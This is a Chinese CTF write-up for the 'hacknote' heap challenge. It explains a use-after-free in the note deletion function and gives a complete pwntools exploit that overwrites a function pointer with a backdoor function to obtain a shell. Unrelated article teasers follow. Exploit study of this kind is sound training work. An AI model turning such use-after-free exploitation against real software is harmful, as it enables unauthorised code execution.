main函数
add_note 函数
notelist是4字节。在源代码中,每个notelist[i]装的是新malloc的地址。
*notelist指向这个地址的内容。
*notelist[i]=print_note_content ,print_note_content又是4个字节。
v1指针指向notelist[0]的内容,即新的malloc地址。那么*notelist内容就可以被分为v1[0]和v1[1]。v1[0]的内容是print_note_content返回值。
v1[1]=malloc(size),即v1[1]里面又装着一个新的chunk地址。
delnote 函数
free两次,没有设置为null,存在UAF漏洞。
此题留有后门函数:
print_note函数
这个函数打印的是第一个chunk的v1[0]部分,也就是print_note_content的地址。
这个题可以想办法把v1[0]的内容,由print_note_content()地址变成magic()函数地址。
这里可以先add note两次,那么,就产生了4个chunk。注意,chunk content一定要比chunk p大。
del note(0)把notelist[0]所连的2个chunkfree掉。因为两个chunk大小不同,会被链在不同的串上。一个是0x10,一个是0x18。
del note(1)把notelist[1]所连的2个chunkfree掉。
可以想到,0x10所连的2个chunk分别是chunk p1和chunk p2。
接着调用add note,设定传送的大小是0x8,而0x8+0x4+0x4=0x10,正好可以分配chunk p2和chunk p1。
不要忘了add note函数的功能:可以把两个chunk链接起来
chunk p2的v1[1]的内容是chunk p1的地址。chunk p2 作为新的chunk p,chunk p1 是chunk content。所以在写入chunk content时,把magic函数作为内容写入。最后利用print_note()函数读取notelist[0]的v1[0]。最后拿到shell。所以此时chunk p1和chunk p2的关系是:
from pwn import *
context.log_level = 'debug'
p = process('./hacknote')
elf = ELF('./hacknote')
def add(size,content='aaaa'):
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.sendlineafter(':',content)
def delete(index):
p.sendlineafter(':','2')
p.sendlineafter(':',str(index))
def show(index):
p.sendlineafter(':','3')
p.sendlineafter(':',str(index))
def dbg():
gdb.attach(p)
pause()
sh = p32(elf.sym['magic'])
add(0x10)
add(0x10)
#dbg()
delete(0)
#dbg()
delete(1)
#dbg()
add(0x8,sh)
#dbg()
show(0)
#dbg()
p.interactive()
这道题绕来绕去好晕啊~吃饭去啦!
本文重点给大家介绍AjaxFileUpload+Struts2实现多文件上传功能,具体实现代码大...
在用java进行web业务开发的时候,对于页面上接收到的参数,除了极少数是步可预知...
我们在用ajax请求数据时,可能会遇到一次点击多次触发的可能。 (比如说:ajax ...
本文实例为大家分享了JS实现纸牌发牌动画的具体代码,供大家参考,具体内容如下 ...
在Sun的Java JDK 1.40版本中,Java自带了支持正则表达式的包,本文就抛砖引玉地...
SQL可以独立完成数据库生命周期中的全部活动,包括定义关系模式、录入数据、建立...
信号章节 -- 信号章节总体概要 信号基本概念 信号是异步事件,发送信号的线程可...
display-namedefaultroot/display-name servlet servlet-namedebugjsp/servlet-n...
MySQL 运维 - 从零开始学习 一、数据库类型 ? 常见的数据库类型 二、数据库管理...
无论是Windows还是macOS,都少不了各种小工具的加持。作为操作系统中必不可少的...